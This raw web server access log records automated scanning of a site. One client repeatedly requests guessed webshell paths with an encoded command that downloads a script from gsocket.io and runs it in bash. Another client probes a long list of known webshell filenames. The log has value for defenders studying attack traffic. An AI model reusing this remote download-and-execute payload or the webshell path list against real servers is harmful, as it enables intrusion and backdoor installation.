206.189.247.132 - - [15/Aug/2025:03:51:15 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [15/Aug/2025:03:51:15 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:03:51:15 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:03:51:15 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.233.9 - - [15/Aug/2025:03:52:16 -0400] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 342 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:17 -0400] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 299 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:17 -0400] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 301 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:18 -0400] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 345 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:18 -0400] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 334 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:20 -0400] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:20 -0400] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:21 -0400] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 340 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:22 -0400] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 324 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:22 -0400] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:23 -0400] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:23 -0400] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 336 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:24 -0400] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 354 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:24 -0400] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 331 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:25 -0400] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 349 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:26 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:26 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:28 -0400] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:28 -0400] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 300 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:29 -0400] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:29 -0400] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:30 -0400] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:30 -0400] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:31 -0400] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:31 -0400] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:32 -0400] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:33 -0400] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:33 -0400] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:34 -0400] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:34 -0400] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:35 -0400] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:36 -0400] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:36 -0400] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:37 -0400] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:37 -0400] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:38 -0400] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:38 -0400] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 313 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:39 -0400] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:39 -0400] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:40 -0400] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:41 -0400] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:41 -0400] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:42 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:42 -0400] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:43 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:43 -0400] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:44 -0400] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:44 -0400] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 317 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:45 -0400] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:46 -0400] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:46 -0400] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:47 -0400] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 302 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:47 -0400] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:48 -0400] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:48 -0400] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:49 -0400] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:49 -0400] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:50 -0400] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:51 -0400] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:51 -0400] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:52 -0400] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:52 -0400] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:53 -0400] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:03:52:53 -0400] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
173.252.79.113 - - [15/Aug/2025:03:58:17 -0400] "GET /teeth-aligners HTTP/1.1" 301 245 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
68.183.245.101 - - [15/Aug/2025:04:06:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:04:06:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:04:06:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:04:06:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
40.69.222.88 - - [15/Aug/2025:04:19:01 -0400] "GET /.alf.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:01 -0400] "GET /.bod/.ll/ss.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:02 -0400] "GET /.well-known/about/function.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:02 -0400] "GET /.well-known/classwithtostring.php HTTP/1.1" 301 264 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:02 -0400] "GET /.well-known/index.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:02 -0400] "GET /.well-known/radio.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:03 -0400] "GET /10.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:03 -0400] "GET /12.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:03 -0400] "GET /13k.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:03 -0400] "GET /87.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:04 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:04 -0400] "GET /about/Geforce.php HTTP/1.1" 301 248 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:04 -0400] "GET /about/function.php HTTP/1.1" 301 249 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:05 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:05 -0400] "GET /admin/admin.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:05 -0400] "GET /admin/function.php HTTP/1.1" 301 249 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:05 -0400] "GET /admin/index.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:06 -0400] "GET /adminfuns.php HTTP/1.1" 301 244 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:06 -0400] "GET /akc.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:06 -0400] "GET /al.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:06 -0400] "GET /alfa.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:07 -0400] "GET /as.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:07 -0400] "GET /asasx.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:07 -0400] "GET /assets/images/doc.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:08 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:08 -0400] "GET /auth.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:08 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:08 -0400] "GET /autoload_classmap/function.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:09 -0400] "GET /b.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:09 -0400] "GET /blog/fw.php HTTP/1.1" 301 242 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:09 -0400] "GET /bugz.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:09 -0400] "GET /byp.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:10 -0400] "GET /cc.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:10 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:10 -0400] "GET /class.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:10 -0400] "GET /classwithtostring.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:11 -0400] "GET /composer.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:11 -0400] "GET /css.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:11 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:11 -0400] "GET /edit.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:12 -0400] "GET /f35.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:12 -0400] "GET /file.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:12 -0400] "GET /file2.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:13 -0400] "GET /filemanager.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:13 -0400] "GET /files/index.php HTTP/1.1" 301 246 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:13 -0400] "GET /fix.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:13 -0400] "GET /flower.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:14 -0400] "GET /fox.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:14 -0400] "GET /function/function.php HTTP/1.1" 301 252 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:14 -0400] "GET /g.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:14 -0400] "GET /gecko.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:15 -0400] "GET /gel4y.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:15 -0400] "GET /gelay.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:15 -0400] "GET /gg.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:15 -0400] "GET /goat.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:16 -0400] "GET /goods.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:16 -0400] "GET /h.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:16 -0400] "GET /images/admin.php HTTP/1.1" 301 247 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:16 -0400] "GET /images/class-config.php HTTP/1.1" 301 254 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:17 -0400] "GET /inc.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:17 -0400] "GET /index.bak.php HTTP/1.1" 301 244 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:17 -0400] "GET /index/function.php HTTP/1.1" 301 249 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:18 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:18 -0400] "GET /infos.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:18 -0400] "GET /ioxi-o.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:18 -0400] "GET /k.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:19 -0400] "GET /m.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:19 -0400] "GET /mar.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:19 -0400] "GET /mini HTTP/1.1" 301 235 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:19 -0400] "GET /mini.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:20 -0400] "GET /mm.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:20 -0400] "GET /ms-edit.php HTTP/1.1" 301 242 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:20 -0400] "GET /ms-themes.php HTTP/1.1" 301 244 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:20 -0400] "GET /options-general.php HTTP/1.1" 301 250 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:21 -0400] "GET /options-reading.php HTTP/1.1" 301 250 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:21 -0400] "GET /options-writing.php HTTP/1.1" 301 250 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:21 -0400] "GET /ova.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:21 -0400] "GET /pages.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:22 -0400] "GET /php.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:22 -0400] "GET /php8.php HTTP/1.1" 301 239 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:22 -0400] "GET /pinfo.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:22 -0400] "GET /radio.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:23 -0400] "GET /robots.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:23 -0400] "GET /rt.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:23 -0400] "GET /s.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:24 -0400] "GET /setup.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:24 -0400] "GET /simple.php HTTP/1.1" 301 241 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:24 -0400] "GET /sts.php HTTP/1.1" 301 238 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:24 -0400] "GET /system_log.php HTTP/1.1" 301 245 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:25 -0400] "GET /test1.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:25 -0400] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 255 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:25 -0400] "GET /tinyfilemanager.php HTTP/1.1" 301 250 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:25 -0400] "GET /ty.php HTTP/1.1" 301 237 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:26 -0400] "GET /users.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:26 -0400] "GET /w.php HTTP/1.1" 301 236 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:26 -0400] "GET /wp-aa.php HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:26 -0400] "GET /wp-admin/ HTTP/1.1" 301 240 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:27 -0400] "GET /wp-admin/admin.php HTTP/1.1" 301 249 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:27 -0400] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 261 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:27 -0400] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 265 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:28 -0400] "GET /wp-admin/css/colors/ectoplasm/about.php HTTP/1.1" 301 270 "-" "-"
40.69.222.88 - - [15/Aug/2025:04:19:28 -0400] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 269 "-" "-"
